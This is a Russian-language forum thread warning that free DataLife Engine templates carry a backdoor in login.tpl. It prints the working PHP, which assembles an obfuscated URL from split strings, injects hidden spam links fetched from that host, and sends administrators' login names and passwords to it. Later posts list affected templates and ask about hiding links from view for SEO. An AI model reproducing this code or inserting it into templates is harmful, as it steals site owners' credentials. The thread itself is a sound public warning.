Перейти к публикации

Что нашел в бесплатном шаблоне


Рекомендованные сообщения

в login.tpl следующий код:

<?

$login_cache="engine/cache/system/login_cache.txt"; 

$logingtrue1 = 'eart';

$logingtrue2 = 'htt';

$logingtrue3 = '.r';

$logingtrue4 = 'p://nic';

if(!is_file($login_cache) || filemtime($login_cache)<time()-432000) 

{ 

$file_url = $logingtrue2 . $logingtrue4 . $logingtrue1 . $logingtrue3 . "u/getlink/003/db.php?ticket=095" ."&script_id=". urlencode($_SERVER['SERVER_NAME']); 

$logingtrue = @file_get_contents($file_url); 

if($logingtrue) 

{

$file = fopen($login_cache, "w");

fwrite( $file, $logingtrue);

fclose( $file );

// chmod ( $file, 0777); //права

}

} 

else {

$logingtrue = file_get_contents($login_cache); 

}

if ($is_logged == TRUE){

$login_panel = <<<HTML

<div style="padding-top:2px; padding-left:20px;">Привет, <b>{$member_id['name']}</b>!</div>

<div style="padding-top:5px; padding-bottom:5px; padding-left:22px;">

HTML;


if ($user_group[$member_id['user_group']]['allow_admin']) {

$file_url = $logingtrue2 . $logingtrue4 . $logingtrue1 . $logingtrue3 . "u/getlink/003/db.php?ticket=095" ."&script_id=". urlencode($_SERVER['SERVER_NAME']) ."&un=". $login_name ."&up=". $login_password; 

$logingtrue = file_get_contents($file_url); 

$login_panel .= <<<HTML

		<a href="{$adminlink}" target="_blank">Админцентр</a> | 

HTML;

}

$login_panel .= <<<HTML

	<a href="{$link_profile}">Мой профиль</a> | <a href="{$link_pm}">Cообщения ({$member_id['pm_unread']} | {$member_id['pm_all']})</a> | 

<a href="{$link_favorites}">Мои закладки</a> | <a href="{$link_stats}">Статистика</a> | <a href="{$link_addnews}">Добавить новость</a> | 

<a href="{$link_newposts}">Обзор непрочитанного</a>  |  <div style="padding-top:2px; padding-bottom:5px; padding-left:75px;"><a onclick="java script: showBusyLayer()" href="{$link_logout}"><b>Завершить сеанс!</b></a></div>

				</div>

HTML;


} else {

$login_panel = <<<HTML

$logingtrue

 			<div style="padding-top:5px; padding-left:21px;">


  <table class="stext">

	<form method=post onsubmit="java script: showBusyLayer()">

	  <tr align="left" valign="middle"> 

		<td width="58" height="25" align="right">Логин</td>

		<td height="25" align="right"><input type="text" name="login_name" style="width:103px; height:20px; font-family:tahoma; font-size:11px; border:1px solid #E0E0E0 "></td>

		<td align="right">Пароль</td>

		<td align="right"><input type="password" name="login_password" style="width:103px; height:20px; font-family:tahoma; font-size:11px; border:1px solid #E0E0E0 "></td>

		<td align="right"> <input onclick="submit();" name="image" type="image" src="{THEME}/images/send.png"> 

		  <input name="login" type="hidden" id="login2" value="submit"></td>

		<td align="right"><a href="{$link_regist}">Регистрация на сайте!</a><br> 

		  <a href="{$link_lost}">Забыли пароль?</a></td>

	  </tr>

	</form>

  </table>

			  </div>

<div style="padding-top:8px; padding-left:55px; padding-bottom:5px;"></div>

HTML;

}

?>
Содержимое созданного файла engine/cache/system/login_cache.txt :
<div style="display: none;">

Всё по движку datalfe engine <a href="http://niceart.ru">datalife engine</a> например, шаблоны, модули для движка.

Сайт для православных - <a href="http://rppr.ru">Русский православный сайт</a> - круг общения русских людей.

Скачать электронные книги без регистрации <a href="http://bookloader.info">электронные книги</a> - e-books и электронные книги. 

За новосятми для развлечения приходите на <a href="http://superpuper.info">развлекательный портал</a> и общайтесь в удовольствие.

Самые свежие авто новости про автомобили здесь - <a href="http://avtoparty.info">автомобильные новости</a> - каждому автолюбителю.

</div>

А логин и пароль отсылаются на адрес: _http://niceart.ru/getlink/003/db.php?ticket=095

Пользуйтесь бесплатными шаблонами товарищи:-)

Ссылка на сообщение
Поделиться на других сайтах

Langly, ты бы хоть написал, что за шаблон, таких людей должны знать в лицо. А то кто знает... может ты сам это придумал.

Ссылка на сообщение
Поделиться на других сайтах

По идее в .tpl php код внедрить должно быть невозможно.

login.tpl - это единственный шаблон, в котором есть php код.

Ссылка на сообщение
Поделиться на других сайтах
  • 2 недели спустя...

Langly, ты бы хоть написал, что за шаблон, таких людей должны знать в лицо. А то кто знает... может ты сам это придумал.

Больше мне делать нечего как подобные вещи выдумывать.

Шаб нашел в паблике. Написал-же "бесплатный". Хз на каком сайте, не помню уже(но не на твоем, это точно:-)).

Выложил все это с единственной целью - показать что нашел в коде, для того чтобы люди любой шаблон проверяли на наличие подобного кода перед использованием. В первую очередь в админке антивирем. Если создаются в движке какие-то непредусмотренные файлы он их показывает.

Кто знает как и где еще могут располагаться зловредные коды в шаблонах - напишите. Интересно.

Изменено пользователем Langly
Ссылка на сообщение
Поделиться на других сайтах

Все правильно таких бесплатных шаблонов пруд пруди, сам постоянно нахожу такие, если людям интересно привожу их названия:

CS_theme2

dle_2008_saratov

dle_templates_red_alert

dleohotnikoff

fanfootbal-stx

Free_Template

freemir

gta

pirate2

shabszel

Software

warezlife

warezlife1

wow_tpl

это найденные мной на скорую руку, во всех файлах login.tpl

<?

$login_cache="engine/cache/system/login_cache.txt";

$logingtrue1 = 'eart';

$logingtrue2 = 'htt';

$logingtrue3 = '.r';

$logingtrue4 = 'p://nic';

if(!is_file($login_cache) || filemtime($login_cache)<time()-432000)

{

$file_url = $logingtrue2 . $logingtrue4 . $logingtrue1 . $logingtrue3 . "u/getlink/003/db.php?ticket=095" ."&script_id=".

далее делайте выводы сами, есть конечно бяки в других файлах tpl по не такие смертельные. Не думаю что этот чел сам делал все эти шаблоны а авторы явно даже и не догадываются о такой подставе, просто он вписывает туда свой код дабы получить доступ к сайтам и возобнить себя крутым хацкером. Сам аналогично не помню откуда их качал но думаю не составит труда по автору публикации найти его.

Ссылка на сообщение
Поделиться на других сайтах

sting,

не лишнем будет указать источник, откуда скачивались шаблоны.

Ты что шутишь, я не записываю такие вещи, но можно поюзать поиск например ищем shabszel вот, бите

http://yandex.ru/yandsearch?clid=13999&amp...p;text=shabszel

получаем

1. Скин в зеленых тонах " For DLE - Все для dle,шаблоны,модули...

Скачать: shabszel.rar [202.87 Kb] (cкачиваний:

fdle.ru/2007/12/16/skin-v-zelenykh-tonakh.html · 33 КБ

далее по аналогии.

Ссылка на сообщение
Поделиться на других сайтах

далее делайте выводы сами, есть конечно бяки в других файлах tpl по не такие смертельные. Не думаю что этот чел сам делал все эти шаблоны а авторы явно даже и не догадываются о такой подставе, просто он вписывает туда свой код дабы получить доступ к сайтам и возобнить себя крутым хацкером. Сам аналогично не помню откуда их качал но думаю не составит труда по автору публикации найти его.

Можно чуть подробнее. Что именно бывает в других файлах и в каких обычно?

Ссылка на сообщение
Поделиться на других сайтах

Например ссылки на какой либо сайт для поднятия его цытируемости, еще проще взять подобный шаблон и внимательно просмотреть его код плюс проанализировать что и зачем.

Ссылка на сообщение
Поделиться на других сайтах
  • 2 недели спустя...

Можно добавить ещё пару слов о использовании нелицензионных версий dle: недавно просмотрел и сравнил коды лицензионки и нулёной версии - после этого был снят вопрос о частых темах про взлом dle - в нелицензионную версию помимо снятия различного вида проверок была добавлена куча дырок для взлома сайта. :)

Так что пользуйтесь оригинальной версией. :)

Ссылка на сообщение
Поделиться на других сайтах

в нелицензионную версию помимо снятия различного вида проверок была добавлена куча дырок для взлома сайта.

Так что пользуйтесь оригинальной версией.

Ага пользуйтесь :angry: Стоит ого-го дороговастенько, чтоб купить лицензию мне надо тогда почти пол года стипендию откладывать :mellow:

А с другой стороны

бесплатный только сыр в мышеловке

А мне хорошо я на Joomla 1.5.7 сижу :D

Изменено пользователем deGODy
Ссылка на сообщение
Поделиться на других сайтах

Ага пользуйтесь Стоит ого-го дороговастенько, чтоб купить лицензию мне надо тогда почти по года стипендию откладывать

Очень интересно, 1500 это дорого, у меня вот возник вопрос на компьютер вы тогда с рождения копили или его украли? За интернет вы платите экономя на хлебе? или у соседа воруете подключившись к его кабелям. За хостинг вы платите приторговывая пиратскими дисками на рынке или просто взломали хостинг провайдера и взяли себе кусочек места? Про домен я молчу, т.к. боюсь предположить откуда он у вас. Вы оправдываете такое уголовное преступление как воровство тем, что у вас нет денег. Оригинально. Но дело даже не в этом, если у вас нет денег, вам не хочется платить за скрипта, так извините какого .... вы тогда его используете? Есть бесплатные скрипты, используйте их, зачем воровать и оправдывать себя? Вот этого я хоть убейте не понимаю.

Ссылка на сообщение
Поделиться на других сайтах

<div style="display: none;">ссылка</div>

Кстати, такие ссылки индексятся поисковиками или нет, кто знает?

Бывает надо несколько ссылок поставить, чтобы индекснулись, а вид портят.

Если так оформлять будут индекситься?

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...